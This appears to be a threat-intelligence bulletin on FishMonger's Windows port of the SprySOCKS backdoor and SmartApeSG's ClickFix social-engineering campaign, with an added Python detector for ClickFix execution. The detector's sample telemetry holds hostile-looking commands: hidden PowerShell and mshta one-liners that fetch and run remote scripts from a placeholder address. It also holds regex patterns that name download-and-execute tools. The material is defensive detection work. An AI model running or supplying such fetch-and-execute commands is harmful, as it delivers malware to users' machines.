FishMonger Espionage Group Porting SprySOCKS Backdoor to Windows

The China-aligned threat actor FishMonger has extended its reach by porting its SprySOCKS backdoor, previously seen only on Linux, to Windows. The port comes in two Windows-native variants: WIN_DRV, which ships a kernel-mode rootkit to hide the implant's processes, files and network activity, and WIN_PLUS, which relies on Windows-native persistence mechanisms instead of a driver. The kernel-mode component is the notable change for defenders: a rootkit running in ring 0 sits beneath the user-mode hooks and process telemetry that most Endpoint Detection and Response (EDR) and antivirus (AV) products depend on, so its presence is meant to blind them rather than merely evade a signature. Both variants use hard-coded Command and Control (C2) settings and communicate over TCP and UDP, giving the group long-term, low-noise access to compromised enterprise Windows hosts. Practically, that means hunting for this family should include an inventory of loaded drivers and their signing status, and network-level review of outbound TCP and UDP sessions, rather than relying on host sensors the rootkit is designed to subvert.

SmartApeSG Campaign Targets Windows Hosts via ClickFix Social Engineering

The SmartApeSG threat actor group is running a high-severity social engineering campaign that uses "ClickFix" lures to compromise Windows hosts. Victims are shown a fake browser error, a bogus CAPTCHA, or a fraudulent "verify you are human" page that instructs them to open the Run dialog (Win+R) or a terminal and paste a command the page has already placed on the clipboard. Because the user launches the command themselves, no exploit is involved and controls that key on exploitation, such as browser sandboxing or attachment scanning, never fire. The pasted command fetches and runs a second stage that installs one of several payloads: Remcos RAT, NetSupport RAT, or the Stealc v2 information stealer. A successful infection gives the operators persistent remote control of the host, credential harvesting at scale, and a foothold for lateral movement inside the enterprise network. The user-initiated execution path is also the detection opportunity: a PowerShell, mshta or cmd process spawned directly by explorer.exe with a download-and-execute command line is rare in normal use, and the Run dialog history (the RunMRU registry key) retains what was pasted.
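The detection opportunity described above, as an added example that is not part of the original page and not SmartApeSG tooling or any vendor's rule: a small heuristic detector in Python that scores Sysmon-style process-creation events (Event ID 1 fields: Image, ParentImage, CommandLine, User) and, with the same scorer, entries from a RunMRU registry key. The sample events, the RunMRU values, the indicator list and its weights, and the 203.0.113.5 address are all constructed for the example; the weights and threshold are an assumption to tune against your own baseline, not an established standard.

```python
"""Heuristic ClickFix detector over constructed Sysmon-style events.

Added example, not from the original page. Field names follow Sysmon
Event ID 1; the events, RunMRU values, indicator weights and threshold
below are constructed/assumed for illustration.
"""
import re
from typing import Dict, List, Tuple

# Binaries a ClickFix lure typically asks the victim to launch from the Win+R
# Run box; explorer.exe is then the parent of the resulting process.
LOLBINS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
           "curl.exe", "certutil.exe"}

# Command-line indicators (regex, weight, label). Weights are an assumption
# for this example; tune them against your own environment's baseline.
INDICATORS: List[Tuple[str, int, str]] = [
    (r"\b(iex|invoke-expression)\b", 3, "inline-eval"),
    (r"\b(iwr|invoke-webrequest|downloadstring|curl|wget)\b", 2, "download"),
    (r"https?://", 2, "remote-url"),
    (r"-(enc|encodedcommand|e)\b", 3, "encoded"),
    (r"-w(indowstyle)?\s+hidden", 2, "hidden-window"),
    (r"\bmshta\b", 3, "mshta"),
    # ClickFix commands often carry a trailing "verification" comment so the
    # pasted text looks legitimate to the victim.
    (r"\b(I am not a robot|verification|captcha)\b", 3, "lure-comment"),
]
THRESHOLD = 5  # assumed alert threshold


def score_command(cmdline: str) -> Tuple[int, List[str]]:
    """Return (score, matched indicator labels) for one command line."""
    score, hits = 0, []
    for pattern, weight, label in INDICATORS:
        if re.search(pattern, cmdline, re.IGNORECASE):
            score += weight
            hits.append(label)
    return score, hits


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect_clickfix(events: List[Dict[str, str]],
                    threshold: int = THRESHOLD) -> List[dict]:
    """Flag LOLBIN children of explorer.exe whose command line scores high."""
    alerts = []
    for ev in events:
        image = _basename(ev.get("Image", ""))
        parent = _basename(ev.get("ParentImage", ""))
        if image not in LOLBINS or parent != "explorer.exe":
            continue
        score, hits = score_command(ev.get("CommandLine", ""))
        if score >= threshold:
            alerts.append({"user": ev.get("User"), "image": image,
                           "score": score, "indicators": hits,
                           "command": ev.get("CommandLine", "")})
    return alerts


def runmru_hits(values: Dict[str, str],
                threshold: int = THRESHOLD) -> List[dict]:
    """Score Run-dialog history. Real RunMRU values end with '\\1' and the
    MRUList value lists entry letters from most to least recent."""
    flagged = []
    for key in values.get("MRUList", ""):
        cmd = values.get(key, "").removesuffix("\\1")
        score, hits = score_command(cmd)
        if score >= threshold:
            flagged.append({"entry": key, "command": cmd,
                            "score": score, "indicators": hits})
    return flagged


# Constructed sample telemetry: two benign events, two ClickFix-style events.
SAMPLE_EVENTS = [
    {"User": "CORP\\alice", "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\notepad.exe", "CommandLine": "notepad.exe"},
    {"User": "CORP\\bob", "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -File C:\\scripts\\inventory.ps1"},
    {"User": "CORP\\carol", "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell -w hidden -c \"iex (iwr 'http://203.0.113.5/verify.ps1' "
                    "-UseBasicParsing).Content\" # I am not a robot - Verification ID: 4821"},
    {"User": "CORP\\dave", "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\mshta.exe",
     "CommandLine": "mshta http://203.0.113.5/check.hta"},
]

# Constructed RunMRU export; "SQBFAFgA" is base64 of UTF-16LE "IEX".
SAMPLE_RUNMRU = {"a": "notepad\\1",
                 "b": "powershell -w hidden -enc SQBFAFgA\\1",
                 "MRUList": "ba"}

if __name__ == "__main__":
    for alert in detect_clickfix(SAMPLE_EVENTS):
        print(f"[process] {alert['user']} {alert['image']} score={alert['score']} {alert['indicators']}")
    for hit in runmru_hits(SAMPLE_RUNMRU):
        print(f"[runmru] entry={hit['entry']} score={hit['score']} {hit['indicators']}")
```

The parent-process condition is what keeps the false-positive rate tolerable: an administrator launching PowerShell from an existing console (bob) is ignored even with a scripted command line, while the same binary spawned straight from the Run box with a download-and-execute one-liner is flagged. Feed real Sysmon events through `detect_clickfix` and the exported RunMRU values of suspect users through `runmru_hits`; both return structured results rather than printing so they can be wired into an existing pipeline.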
